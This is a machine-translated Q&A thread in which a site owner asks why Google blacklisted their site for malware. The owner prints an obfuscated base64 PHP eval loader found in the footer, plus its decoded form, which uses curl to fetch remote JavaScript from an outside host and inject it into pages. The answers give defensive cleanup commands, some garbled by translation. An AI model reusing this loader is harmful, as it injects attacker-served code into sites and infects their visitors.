谷歌标记的网站恶意软件

Question

以下是谷歌检测为恶意软件的链接的屏幕截图：

我正在网站ExclusivelyHybrid

上工作

它有与之相关的adwords。突然谷歌将该网站列入黑名单，并表示他们的服务器遭到网站恶意软件的攻击。<​​/ p>

在网站扫描仪上检查已交叉，未找到恶意软件。

要求谷歌扫描它们，他们也没有在网站上发现任何恶意软件。 然后要求hostgator进行深度扫描，他们也没有发现任何恶意软件。

谷歌同意再次启动adword广告系列，但他们再次受到恶意软件攻击，并将该网站列入黑名单。

hostgator的编码员检查了该网站，发现有3个链接导致了问题。

我有链接，但点击它们的电脑会被感染（我应该在这里分享链接吗？）

我搜索了整个源代码和网站的所有javascripts没有找到这样的链接。

任何人都可以帮助建议这些链接的位置和位置吗？

在这里，我在网站的页脚中找到了：

<?php error_reporting(0); eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUmxSc2FHbFNla1pOVldwR2RtVkdiSFJOVlRsT1VqQmFXVlF4YUZkWFZURnpWMVJDV2xadGFGQlVWV1JQVGxadmVVNVdjRTVOVm04eFYxZDBXazVYVGtoVGJsSnBVa1ZLVEZwV1pEQmtNVVY1V2toT1QwMUZOWFZaVkVKM1V6Rk9SMWRxVmxwaE1EVkRWREZXYzFKR1RuUlBWM1JVVW10dmVsWkVTbkpPUjFKMFVtNVNVMkZyY0dGV01GcExZekZyZVUxSVpHeFNXR2d4VlZkd1QxUlZNWFZSYlRsaFVucEdSMXBITVVka1ZrcHhVbTFHV0ZKWE9IaFdSVnBUVW0xU1ZrNVlRazlUU0VKT1dXeFNSMlF4YkhSaGVrWnFWakEwTVZVeFVtdFNSbTk1WkVWMFZHRXlVbEJaYWtKelVsVXhTRnBHY0U1TlZtOHhWMWQwV2s1WFRraFRibEpwVWtWS1RWVlVTbnBOTVVWNVdraEtWR0V6UWtwV1Z6VkRZVlpaZUZkcVNtRlNiV2hUVjJwR1ExWkdSbFZTYkVKclRXcHNURlZVUm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwaFJWWlhZa1p3VEZaR1dsSmxSa1p6Vm14c1RsWnNjRlZXYTFaUFRUSkZlVlZzYkZSaWF6Vk5WbXRvVDFSR1JYaFNiazVvWWxaS1dsVXlOVTlY.VlRCM1RsaE9ZVkpYVFRGYVJFcFRVa1p2ZVdSR2NFNWlWMUkyVmxaU1IxWXhWWGhWYTFwUVZtdGFXRlZ0Y0hOV1JsWnpWMnhPVjJKR1dubFViRnBYVm0xRmQxZHNRbGRXUlVwb1ZXMTRWMk5IVVhwaFJYaFhVMFUxVFZWVVJrZGpNa1owVld4c1ZHSnJOVnBVVkVFeFl6RndSbGw2Vm10TmJFcEZWMnBLTUZkck1YUmFTSEJXVmtWYVdGWlVSbE5TYXpsWFVteGtVMkZ0ZUVaV2ExSkNUVlpSZUZOc1dsVmlSbHBZVld4a05GUXhWbk5XVkZaWC5Za1p3UlZwRVNqQmhNVWw1WlVSQ1dHSkhUVEZVVm1SVFVrZEdObHBGVW1GTmJsSk1WVEowYTFVeVJraFZhMmhUVmpKU1VsWlVRa3RqVm5CSFlVVjBhazFYWkRWV2JYQlRXVlpaZDAxWVdsUmhNbEpRV1dwQ01GWlhUWGRrUlZKV1ZqTm9lRmRyV205VE1rMTRXak5zVldKck5YQlVWRUV4WXpGTmQxUnNUbWhpVlZwRldWaHdhMUpHYjNsa1JYUllZa2RTVUZscVNrdE9Wa1pZWWtWMFUwMVZjSFpYYTFaclVtMUdWazlVVG1sTlNFSjBWbFpqTkdORmRGVmplV3R3VDNjcEtUcykpOw)); ?>

它解码为：

if(function_exists('curl_init'))
{
    $url = "http://javaterm1.pw/java/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";
}

Answer 1

请勿使用网站扫描仪。它们无法正常工作。 您必须查看访问日志。

在查看日志之前，您可以使用shell。 搜索此字符串：

rgrep'eval（gzinflate（base64_decode'* -l <​​/ p>

如果您发现了某些内容，可以使用以下字符串将其删除：

find ./ -type f -exec sed -i'/ eval（gzinflate（base64_decode / d'{} \;

之后删除访问日志，重新启动apache，如果恶意软件又回来了，请查看访问日志。 就我而言，恶意软件就在那里：

[30 / Jul / 2015：11：57：13 +0200]“POST /wp-content/themes/skeleton/404.php

Answer 2

你绝对在该网站上有可疑行为。我刚刚被重定向到一个欺诈性的骗局＆＃39; ＆＃34;你是我们在Firefox上的第100个访问者＆＃34;。

我没有按任何按钮或其他任何东西。

查找插入的Javascript代码，从头开始插入基本HTML页面，看看问题是否仍然存在。